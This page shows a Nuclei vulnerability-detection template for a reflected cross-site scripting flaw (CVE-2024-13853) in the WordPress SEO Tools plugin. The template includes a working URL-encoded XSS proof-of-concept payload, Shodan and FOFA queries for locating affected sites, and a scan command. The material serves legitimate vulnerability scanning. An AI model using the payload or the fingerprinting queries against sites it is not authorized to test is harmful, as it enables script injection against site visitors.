Skip to content

WordPress SEO Tools Plugin 4.0.7 - Cross-Site Scripting

ID: CVE-2024-13853

Severity: medium

Author: ritikchaddha

Tags: cve,cve2024,wp,wordpress,wp-plugin,xss,seo-automatic-seo-tools

The SEO Tools WordPress plugin through version 4.0.7 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the ‘src’ parameter in the rssread.php file before outputting it back in the page, which could allow attackers to execute arbitrary JavaScript code in a victim’s browser.

id: CVE-2024-13853
info:
name: WordPress SEO Tools Plugin 4.0.7 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
The SEO Tools WordPress plugin through version 4.0.7 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the 'src' parameter in the rssread.php file before outputting it back in the page, which could allow attackers to execute arbitrary JavaScript code in a victim's browser.
reference:
- https://wpscan.com/vulnerability/52991dd9-41f7-4cf8-b8c9-56dd4e62bf0c
- https://nvd.nist.gov/vuln/detail/CVE-2024-13853
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-13853
cwe-id: CWE-79
metadata:
max-request: 1
vendor: WordPress
product: seo-automatic-seo-tools
shodan-query: http.html:"seo-automatic-seo-tools"
fofa-query: body="wp-content/plugins/seo-automatic-seo-tools/"
tags: cve,cve2024,wp,wordpress,wp-plugin,xss,seo-automatic-seo-tools
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
matchers:
- type: word
part: body
words:
- 'seo-automatic-seo-tools'
internal: true
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/seo-automatic-seo-tools/feedcommander/rssread.php?src=1%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"></script><script>alert(document.domain)</script><script>'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a00473045022100ae0b17f26705d4c092f581841a2a11e7103e5e87e7dafeb97c4f40cca01a3219022001e26f620cad3a1a2dcd6d3fbb936c2c88efa458cbf44282e2622b8d89220020:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-13853.yaml"

View on Github